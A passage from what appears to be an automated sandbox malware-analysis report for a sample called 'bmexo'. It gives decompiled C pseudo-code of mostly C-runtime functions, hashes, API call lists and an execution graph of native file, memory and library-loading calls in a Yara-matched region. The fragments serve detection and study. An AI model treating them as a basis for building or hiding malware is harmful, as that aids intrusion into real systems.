                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction ID: 53679f9e9f826de9714607a961869154b42b86f33cd884e755be5cba76d35680
                                          • Opcode Fuzzy Hash: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction Fuzzy Hash: 07F090B391923659E679B7787C036CA3A84CF01730B24862EF464DC0D2FF5DDA817A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E00F27452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                          				void* _t7;
                                          				void* _t8;
                                          				intOrPtr* _t9;
                                          				intOrPtr* _t12;
                                          				void* _t20;
                                          				long _t31;
                                          
                                          				if(_a4 != 0) {
                                          					_t31 = _a8;
                                          					if(_t31 != 0) {
                                          						_push(__ebx);
                                          						while(_t31 <= 0xffffffe0) {
                                          							if(_t31 == 0) {
                                          								_t31 = _t31 + 1;
                                          							}
                                          							_t7 = HeapReAlloc( *0xf34834, 0, _a4, _t31);
                                          							_t20 = _t7;
                                          							if(_t20 != 0) {
                                          								L17:
                                          								_t8 = _t20;
                                          							} else {
                                          								if( *0xf34830 == _t7) {
                                          									_t9 = E00F21CC3();
                                          									 *_t9 = E00F21CD6(GetLastError());
                                          									goto L17;
                                          								} else {
                                          									if(E00F21741(_t7, _t31) == 0) {
                                          										_t12 = E00F21CC3();
                                          										 *_t12 = E00F21CD6(GetLastError());
                                          										L12:
                                          										_t8 = 0;
                                          									} else {
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          							goto L14;
                                          						}
                                          						E00F21741(_t6, _t31);
                                          						 *((intOrPtr*)(E00F21CC3())) = 0xc;
                                          						goto L12;
                                          					} else {
                                          						E00F24831(_a4);
                                          						_t8 = 0;
                                          					}
                                          					L14:
                                          					return _t8;
                                          				} else {
                                          					return E00F2114B(__ebx, __edx, __edi, _a8);
                                          				}
                                          			}

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2745E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                          • _free.LIBCMT ref: 00F27471
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          • Opcode ID: daeaece3dd57e1633c5abac113a44338899c63b2ac03801185fd963ca12dd68e
                                          • Instruction ID: fb447e93684eef3c71140e95eba00b7b1477385d4cae60da360431e1652530e0
                                          • Opcode Fuzzy Hash: daeaece3dd57e1633c5abac113a44338899c63b2ac03801185fd963ca12dd68e
                                          • Instruction Fuzzy Hash: EE110A32D4A735DBCB31BF70BC45B5A3FD8BF10370B204529F9489A250DA788841F694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F291C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				signed int _v20;
                                          				signed int _t35;
                                          				int _t38;
                                          				signed int _t41;
                                          				int _t42;
                                          				intOrPtr* _t44;
                                          				int _t47;
                                          				short* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t54;
                                          				int _t55;
                                          				signed int _t59;
                                          				char* _t62;
                                          
                                          				_t62 = _a8;
                                          				if(_t62 == 0) {
                                          					L5:
                                          					return 0;
                                          				}
                                          				_t50 = _a12;
                                          				if(_t50 == 0) {
                                          					goto L5;
                                          				}
                                          				if( *_t62 != 0) {
                                          					E00F24BFC( &_v20, _a16);
                                          					_t35 = _v20;
                                          					__eflags =  *(_t35 + 0xa8);
                                          					if( *(_t35 + 0xa8) != 0) {
                                          						_t38 = E00F2917B( *_t62 & 0x000000ff,  &_v20);
                                          						__eflags = _t38;
                                          						if(_t38 == 0) {
                                          							__eflags = _a4;
                                          							_t41 = _v20;
                                          							_t59 = 1;
                                          							_t28 = _t41 + 4; // 0x840ffff8
                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                          							__eflags = _t42;
                                          							if(_t42 != 0) {
                                          								L21:
                                          								__eflags = _v8;
                                          								if(_v8 != 0) {
                                          									_t54 = _v12;
                                          									_t31 = _t54 + 0x70;
                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                          									__eflags =  *_t31;
                                          								}
                                          								return _t59;
                                          							}
                                          							L20:
                                          							_t44 = E00F21CC3();
                                          							_t59 = _t59 | 0xffffffff;
                                          							__eflags = _t59;
                                          							 *_t44 = 0x2a;
                                          							goto L21;
                                          						}
                                          						_t59 = _v20;
                                          						__eflags =  *(_t59 + 0x74) - 1;
                                          						if( *(_t59 + 0x74) <= 1) {
                                          							L15:
                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                          							__eflags = _t50 -  *_t20;
                                          							L16:
                                          							if(__eflags < 0) {
                                          								goto L20;
                                          							}
                                          							__eflags = _t62[1];
                                          							if(_t62[1] == 0) {
                                          								goto L20;
                                          							}
                                          							L18:
                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                          							_t59 =  *_t22;
                                          							goto L21;
                                          						}
                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                          						__eflags = _t50 -  *_t12;
                                          						if(__eflags < 0) {
                                          							goto L16;
                                          						}
                                          						__eflags = _a4;
                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                          						_t18 = _t59 + 4; // 0x840ffff8
                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                          						_t59 = _v20;
                                          						__eflags = _t47;
                                          						if(_t47 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L15;
                                          					}
                                          					_t55 = _a4;
                                          					__eflags = _t55;
                                          					if(_t55 != 0) {
                                          						 *_t55 =  *_t62 & 0x000000ff;
                                          					}
                                          					_t59 = 1;
                                          					goto L21;
                                          				}
                                          				_t49 = _a4;
                                          				if(_t49 != 0) {
                                          					 *_t49 = 0;
                                          				}
                                          				goto L5;
                                          			}

                                          0x00f291ce
                                          0x00f291d3
                                          0x00f291ed
                                          0x00000000
                                          0x00f291ed
                                          0x00f291d5
                                          0x00f291da
                                          0x00000000
                                          0x00000000
                                          0x00f291df
                                          0x00f291fc
                                          0x00f29201
                                          0x00f29204
                                          0x00f2920b
                                          0x00f2922a
                                          0x00f29231
                                          0x00f29233
                                          0x00f29277
                                          0x00f29283
                                          0x00f29286
                                          0x00f2928b
                                          0x00f2928e
                                          0x00f29294
                                          0x00f29296
                                          0x00f292a6
                                          0x00f292a6
                                          0x00f292aa
                                          0x00f292ac
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00000000
                                          0x00f292b5
                                          0x00f29298
                                          0x00f29298
                                          0x00f2929d
                                          0x00f2929d
                                          0x00f292a0
                                          0x00000000
                                          0x00f292a0
                                          0x00f29235
                                          0x00f29238
                                          0x00f2923c
                                          0x00f29265
                                          0x00f29265
                                          0x00f29265
                                          0x00f29268
                                          0x00f29268
                                          0x00000000
                                          0x00000000
                                          0x00f2926a
                                          0x00f2926e
                                          0x00000000
                                          0x00000000
                                          0x00f29270
                                          0x00f29270
                                          0x00f29270
                                          0x00000000
                                          0x00f29270
                                          0x00f2923e
                                          0x00f2923e
                                          0x00f29241
                                          0x00000000
                                          0x00000000
                                          0x00f29245
                                          0x00f2924f
                                          0x00f29255
                                          0x00f29258
                                          0x00f2925e
                                          0x00f29261
                                          0x00f29263
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f29263
                                          0x00f2920d
                                          0x00f29210
                                          0x00f29212
                                          0x00f29217
                                          0x00f29217
                                          0x00f2921c
                                          0x00000000
                                          0x00f2921c
                                          0x00f291e1
                                          0x00f291e6
                                          0x00f291ea
                                          0x00f291ea
                                          0x00000000

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F291FC
                                          • __isleadbyte_l.LIBCMT ref: 00F2922A
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00F29258
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00F2928E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction ID: 34b7bf88b492c4c59b988d285d04bcdaf9f50fc81949221ba18132c730b57abb
                                          • Opcode Fuzzy Hash: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction Fuzzy Hash: C131E431A0826AFFDB218F75EC44BAA7BA5FF41320F154128E8648B1E0D7B1D851EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F2A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                          				intOrPtr _t25;
                                          				void* _t26;
                                          
                                          				_t25 = _a16;
                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                          					_t26 = E00F2AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                          					goto L9;
                                          				} else {
                                          					_t34 = _t25 - 0x66;
                                          					if(_t25 != 0x66) {
                                          						__eflags = _t25 - 0x61;
                                          						if(_t25 == 0x61) {
                                          							L7:
                                          							_t26 = E00F2A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                                          						} else {
                                          							__eflags = _t25 - 0x41;
                                          							if(__eflags == 0) {
                                          								goto L7;
                                          							} else {
                                          								_t26 = E00F2B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                          							}
                                          						}
                                          						L9:
                                          						return _t26;
                                          					} else {
                                          						return E00F2B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                          					}
                                          				}
                                          			}

                                          0x00f2a950
                                          0x00f2a956
                                          0x00f2a9c9
                                          0x00000000
                                          0x00f2a95d
                                          0x00f2a95d
                                          0x00f2a960
                                          0x00f2a97b
                                          0x00f2a97e
                                          0x00f2a99e
                                          0x00f2a9b0
                                          0x00f2a980
                                          0x00f2a980
                                          0x00f2a983
                                          0x00000000
                                          0x00f2a985
                                          0x00f2a997
                                          0x00f2a997
                                          0x00f2a983
                                          0x00f2a9ce
                                          0x00f2a9d2
                                          0x00f2a962
                                          0x00f2a97a
                                          0x00f2a97a
                                          0x00f2a960

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0f974109ce9aa9442daa4af383d644670cdb3cd038edc5ee5ffd28896f359a78
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 5F014B7244025EFBCF125E85ED518EE3F27BB18354B5A8515FE2958031D336C9B1BB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:5.5%
                                          Total number of Nodes:618
                                          Total number of Limit Nodes:76
                                          execution_graph 61209 41f250 61212 41b9d0 61209->61212 61213 41b9f6 61212->61213 61224 409160 61213->61224 61215 41ba02 61216 41ba49 61215->61216 61232 40d770 61215->61232 61218 41ba17 61219 41ba2c 61218->61219 61280 41a660 61218->61280 61244 40ac10 61219->61244 61222 41ba3b 61223 41a660 2 API calls 61222->61223 61223->61216 61225 40916d 61224->61225 61283 4090b0 61224->61283 61227 409174 61225->61227 61295 409050 61225->61295 61227->61215 61233 40d79c 61232->61233 61704 40a610 61233->61704 61235 40d7ae 61708 40d680 61235->61708 61238 40d7f2 61238->61218 61239 40d7e1 61239->61238 61243 41a440 2 API calls 61239->61243 61240 40d7d4 61240->61218 61241 40d7c9 61241->61240 61242 41a440 2 API calls 61241->61242 61242->61240 61243->61238 61245 40ac35 61244->61245 61246 40a610 LdrLoadDll 61245->61246 61247 40ac8c 61246->61247 61727 40a290 61247->61727 61249 40af03 61249->61222 61250 40acb2 61250->61249 61736 414ff0 61250->61736 61252 40acf7 61252->61249 61739 407e10 61252->61739 61254 40ad3b 61254->61249 61756 41a4b0 61254->61756 61258 40ad91 61259 40ad98 61258->61259 61768 419fc0 61258->61768 61260 41bee0 2 API calls 61259->61260 61262 40ada5 61260->61262 61262->61222 61264 40ade2 61265 41bee0 2 API calls 61264->61265 61266 40ade9 61265->61266 61266->61222 61267 40adf2 61268 40d800 3 API calls 61267->61268 61269 40ae66 61268->61269 61269->61259 61270 40ae71 61269->61270 61271 41bee0 2 API calls 61270->61271 61272 40ae95 61271->61272 61773 41a010 61272->61773 61275 419fc0 2 API calls 61276 40aed0 61275->61276 61276->61249 61778 419dd0 61276->61778 61279 41a660 2 API calls 61279->61249 61281 41af60 LdrLoadDll 61280->61281 61282 41a67f ExitProcess 61281->61282 61282->61219 61314 418b80 61283->61314 61287 4090d6 61287->61225 61288 4090cc 61288->61287 61321 41b310 61288->61321 61290 409113 61290->61287 61332 408ed0 61290->61332 61292 409133 61338 408920 LdrLoadDll 61292->61338 61294 409145 61294->61225 61296 40906a 61295->61296 61297 
41b600 LdrLoadDll 61295->61297 61679 41b600 61296->61679 61297->61296 61300 41b600 LdrLoadDll 61301 409091 61300->61301 61302 40d570 61301->61302 61303 40d589 61302->61303 61687 40a490 61303->61687 61305 40d59c 61691 41a190 61305->61691 61309 40d5c2 61312 40d5ed 61309->61312 61697 41a210 61309->61697 61311 41a440 2 API calls 61313 409185 61311->61313 61312->61311 61313->61215 61315 418b8f 61314->61315 61339 415aa0 61315->61339 61317 4090c3 61318 418a30 61317->61318 61345 41a5b0 61318->61345 61322 41b329 61321->61322 61352 4156a0 61322->61352 61324 41b341 61325 41b34a 61324->61325 61391 41b150 61324->61391 61325->61290 61327 41b35e 61327->61325 61408 419eb0 61327->61408 61657 407210 61332->61657 61334 408ef1 61334->61292 61335 408eea 61335->61334 61670 4074d0 61335->61670 61338->61294 61340 415aae 61339->61340 61342 415aba 61339->61342 61340->61342 61344 415f20 LdrLoadDll 61340->61344 61342->61317 61343 415c0c 61343->61317 61344->61343 61348 41af60 61345->61348 61347 418a45 61347->61288 61349 41afe5 61348->61349 61351 41af6f 61348->61351 61349->61347 61350 415aa0 LdrLoadDll 61350->61349 61351->61349 61351->61350 61353 4159d5 61352->61353 61363 4156b4 61352->61363 61353->61324 61356 4157e0 61419 41a310 61356->61419 61357 4157c3 61476 41a410 LdrLoadDll 61357->61476 61360 4157cd 61360->61324 61361 415807 61362 41bee0 2 API calls 61361->61362 61365 415813 61362->61365 61363->61353 61416 419c00 61363->61416 61364 415999 61367 41a440 2 API calls 61364->61367 61365->61360 61365->61364 61366 4159af 61365->61366 61371 4158a2 61365->61371 61485 4153e0 LdrLoadDll NtReadFile NtClose 61366->61485 61368 4159a0 61367->61368 61368->61324 61370 4159c2 61370->61324 61372 415909 61371->61372 61373 4158b1 61371->61373 61372->61364 61374 41591c 61372->61374 61376 4158b6 61373->61376 61377 4158ca 61373->61377 61478 41a290 61374->61478 61477 4152a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 61376->61477 61380 4158e7 61377->61380 61381 4158cf 61377->61381 61380->61368 61434 
415060 61380->61434 61422 415340 61381->61422 61383 4158c0 61383->61324 61385 41597c 61482 41a440 61385->61482 61386 4158dd 61386->61324 61389 4158ff 61389->61324 61390 415988 61390->61324 61392 41b16b 61391->61392 61393 41b17d 61392->61393 61503 41be60 61392->61503 61393->61327 61395 41b19d 61506 414cc0 61395->61506 61397 41b1c0 61397->61393 61398 414cc0 3 API calls 61397->61398 61401 41b1e2 61398->61401 61400 41b26a 61402 41b27a 61400->61402 61626 41aee0 LdrLoadDll 61400->61626 61401->61393 61531 415fe0 61401->61531 61542 41ad50 61402->61542 61405 41b2a8 61621 419e70 61405->61621 61409 41af60 LdrLoadDll 61408->61409 61410 419ecc 61409->61410 61653 99fae8 LdrInitializeThunk 61410->61653 61411 419ee7 61413 41bee0 61411->61413 61414 41b3b9 61413->61414 61654 41a620 61413->61654 61414->61290 61417 415794 61416->61417 61418 41af60 LdrLoadDll 61416->61418 61417->61356 61417->61357 61417->61360 61418->61417 61420 41a32c NtCreateFile 61419->61420 61421 41af60 LdrLoadDll 61419->61421 61420->61361 61421->61420 61423 41535c 61422->61423 61424 41a290 LdrLoadDll 61423->61424 61425 41537d 61424->61425 61426 415384 61425->61426 61427 415398 61425->61427 61428 41a440 2 API calls 61426->61428 61429 41a440 2 API calls 61427->61429 61430 41538d 61428->61430 61431 4153a1 61429->61431 61430->61386 61486 41c0f0 LdrLoadDll RtlAllocateHeap 61431->61486 61433 4153ac 61433->61386 61435 4150ab 61434->61435 61436 4150de 61434->61436 61438 41a290 LdrLoadDll 61435->61438 61437 415229 61436->61437 61441 4150fa 61436->61441 61439 41a290 LdrLoadDll 61437->61439 61440 4150c6 61438->61440 61446 415244 61439->61446 61442 41a440 2 API calls 61440->61442 61443 41a290 LdrLoadDll 61441->61443 61444 4150cf 61442->61444 61445 415115 61443->61445 61444->61389 61448 415131 61445->61448 61449 41511c 61445->61449 61499 41a2d0 LdrLoadDll 61446->61499 61452 415136 61448->61452 61453 41514c 61448->61453 61451 41a440 2 API calls 61449->61451 61450 41527e 61454 41a440 2 API calls 61450->61454 61455 415125 
61451->61455 61456 41a440 2 API calls 61452->61456 61462 415151 61453->61462 61487 41c0b0 61453->61487 61459 415289 61454->61459 61455->61389 61457 41513f 61456->61457 61457->61389 61458 415163 61458->61389 61459->61389 61462->61458 61490 41a3c0 61462->61490 61463 4151b7 61464 4151ce 61463->61464 61498 41a250 LdrLoadDll 61463->61498 61465 4151d5 61464->61465 61466 4151ea 61464->61466 61468 41a440 2 API calls 61465->61468 61469 41a440 2 API calls 61466->61469 61468->61458 61470 4151f3 61469->61470 61471 41521f 61470->61471 61493 41bcb0 61470->61493 61471->61389 61473 41520a 61474 41bee0 2 API calls 61473->61474 61475 415213 61474->61475 61475->61389 61476->61360 61477->61383 61479 415964 61478->61479 61480 41af60 LdrLoadDll 61478->61480 61481 41a2d0 LdrLoadDll 61479->61481 61480->61479 61481->61385 61483 41af60 LdrLoadDll 61482->61483 61484 41a45c NtClose 61483->61484 61484->61390 61485->61370 61486->61433 61489 41c0c8 61487->61489 61500 41a5e0 61487->61500 61489->61462 61491 41af60 LdrLoadDll 61490->61491 61492 41a3dc NtReadFile 61491->61492 61492->61463 61494 41bcd4 61493->61494 61495 41bcbd 61493->61495 61494->61473 61495->61494 61496 41c0b0 2 API calls 61495->61496 61497 41bceb 61496->61497 61497->61473 61498->61464 61499->61450 61501 41af60 LdrLoadDll 61500->61501 61502 41a5fc RtlAllocateHeap 61501->61502 61502->61489 61627 41a4f0 61503->61627 61505 41be8d 61505->61395 61507 414cd1 61506->61507 61509 414cd9 61506->61509 61507->61397 61508 414fac 61508->61397 61509->61508 61630 41d090 61509->61630 61511 414d2d 61512 41d090 2 API calls 61511->61512 61516 414d38 61512->61516 61513 414d86 61515 41d090 2 API calls 61513->61515 61517 414d9a 61515->61517 61516->61513 61635 41d130 61516->61635 61518 41d090 2 API calls 61517->61518 61520 414e0d 61518->61520 61519 41d090 2 API calls 61528 414e55 61519->61528 61520->61519 61522 414f84 61642 41d0f0 LdrLoadDll RtlFreeHeap 61522->61642 61524 414f8e 61643 41d0f0 LdrLoadDll RtlFreeHeap 61524->61643 61526 414f98 61644 41d0f0 
LdrLoadDll RtlFreeHeap 61526->61644 61641 41d0f0 LdrLoadDll RtlFreeHeap 61528->61641 61529 414fa2 61645 41d0f0 LdrLoadDll RtlFreeHeap 61529->61645 61532 415ff1 61531->61532 61533 4156a0 8 API calls 61532->61533 61538 416007 61533->61538 61534 416010 61534->61400 61535 416047 61536 41bee0 2 API calls 61535->61536 61537 416058 61536->61537 61537->61400 61538->61534 61538->61535 61539 416093 61538->61539 61540 41bee0 2 API calls 61539->61540 61541 416098 61540->61541 61541->61400 61543 41ad64 61542->61543 61544 41abe0 LdrLoadDll 61542->61544 61646 41abe0 61543->61646 61544->61543 61546 41ad6d 61547 41abe0 LdrLoadDll 61546->61547 61548 41ad76 61547->61548 61549 41abe0 LdrLoadDll 61548->61549 61550 41ad7f 61549->61550 61551 41abe0 LdrLoadDll 61550->61551 61552 41ad88 61551->61552 61553 41abe0 LdrLoadDll 61552->61553 61554 41ad91 61553->61554 61555 41abe0 LdrLoadDll 61554->61555 61556 41ad9d 61555->61556 61557 41abe0 LdrLoadDll 61556->61557 61558 41ada6 61557->61558 61559 41abe0 LdrLoadDll 61558->61559 61560 41adaf 61559->61560 61561 41abe0 LdrLoadDll 61560->61561 61562 41adb8 61561->61562 61563 41abe0 LdrLoadDll 61562->61563 61564 41adc1 61563->61564 61565 41abe0 LdrLoadDll 61564->61565 61566 41adca 61565->61566 61567 41abe0 LdrLoadDll 61566->61567 61568 41add6 61567->61568 61569 41abe0 LdrLoadDll 61568->61569 61570 41addf 61569->61570 61571 41abe0 LdrLoadDll 61570->61571 61572 41ade8 61571->61572 61573 41abe0 LdrLoadDll 61572->61573 61574 41adf1 61573->61574 61575 41abe0 LdrLoadDll 61574->61575 61576 41adfa 61575->61576 61577 41abe0 LdrLoadDll 61576->61577 61578 41ae03 61577->61578 61579 41abe0 LdrLoadDll 61578->61579 61580 41ae0f 61579->61580 61581 41abe0 LdrLoadDll 61580->61581 61582 41ae18 61581->61582 61583 41abe0 LdrLoadDll 61582->61583 61584 41ae21 61583->61584 61585 41abe0 LdrLoadDll 61584->61585 61586 41ae2a 61585->61586 61587 41abe0 LdrLoadDll 61586->61587 61588 41ae33 61587->61588 61589 41abe0 LdrLoadDll 61588->61589 61590 41ae3c 61589->61590 61591 41abe0 
LdrLoadDll 61590->61591 61592 41ae48 61591->61592 61593 41abe0 LdrLoadDll 61592->61593 61594 41ae51 61593->61594 61595 41abe0 LdrLoadDll 61594->61595 61596 41ae5a 61595->61596 61597 41abe0 LdrLoadDll 61596->61597 61598 41ae63 61597->61598 61599 41abe0 LdrLoadDll 61598->61599 61600 41ae6c 61599->61600 61601 41abe0 LdrLoadDll 61600->61601 61602 41ae75 61601->61602 61603 41abe0 LdrLoadDll 61602->61603 61604 41ae81 61603->61604 61605 41abe0 LdrLoadDll 61604->61605 61606 41ae8a 61605->61606 61607 41abe0 LdrLoadDll 61606->61607 61608 41ae93 61607->61608 61609 41abe0 LdrLoadDll 61608->61609 61610 41ae9c 61609->61610 61611 41abe0 LdrLoadDll 61610->61611 61612 41aea5 61611->61612 61613 41abe0 LdrLoadDll 61612->61613 61614 41aeae 61613->61614 61615 41abe0 LdrLoadDll 61614->61615 61616 41aeba 61615->61616 61617 41abe0 LdrLoadDll 61616->61617 61618 41aec3 61617->61618 61619 41abe0 LdrLoadDll 61618->61619 61620 41aecc 61619->61620 61620->61405 61622 41af60 LdrLoadDll 61621->61622 61623 419e8c 61622->61623 61652 99fdc0 LdrInitializeThunk 61623->61652 61624 419ea3 61624->61327 61626->61402 61628 41a50c NtAllocateVirtualMemory 61627->61628 61629 41af60 LdrLoadDll 61627->61629 61628->61505 61629->61628 61631 41d0a0 61630->61631 61632 41d0a6 61630->61632 61631->61511 61633 41c0b0 2 API calls 61632->61633 61634 41d0cc 61633->61634 61634->61511 61636 41d140 61635->61636 61637 41c0b0 2 API calls 61636->61637 61638 41d18d 61636->61638 61639 41d16a 61637->61639 61638->61516 61640 41bee0 2 API calls 61639->61640 61640->61638 61641->61522 61642->61524 61643->61526 61644->61529 61645->61508 61647 41abfb 61646->61647 61648 415aa0 LdrLoadDll 61647->61648 61649 41ac1b 61648->61649 61650 415aa0 LdrLoadDll 61649->61650 61651 41accf 61649->61651 61650->61651 61651->61546 61651->61651 61652->61624 61653->61411 61655 41af60 LdrLoadDll 61654->61655 61656 41a63c RtlFreeHeap 61655->61656 61656->61414 61658 407220 61657->61658 61659 40721b 61657->61659 61660 41be60 2 API calls 61658->61660 61659->61335 

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 225 40a140-40a169 call 41cdb0 228 40a16b-40a16e 225->228 229 40a16f-40a17d call 41d1d0 225->229 232 40a18d-40a19e call 41b500 229->232 233 40a17f-40a18a call 41d450 229->233 238 40a1a0-40a1b4 LdrLoadDll 232->238 239 40a1b7-40a1ba 232->239 233->232 238->239
                                          C-Code - Quality: 100%
                                          			E0040A140(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041CDB0( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041D1D0(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041D450( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041B500(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1B2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction ID: dc890c527bf6af6b94e60bcd83cd2d34ae48ac36e0c5593c426351ed1e2082f7
                                          • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction Fuzzy Hash: 490112B5D4020DB7DF10DBA5DC42FDEB7789B54308F0441A6A908A7281F635EB54C795
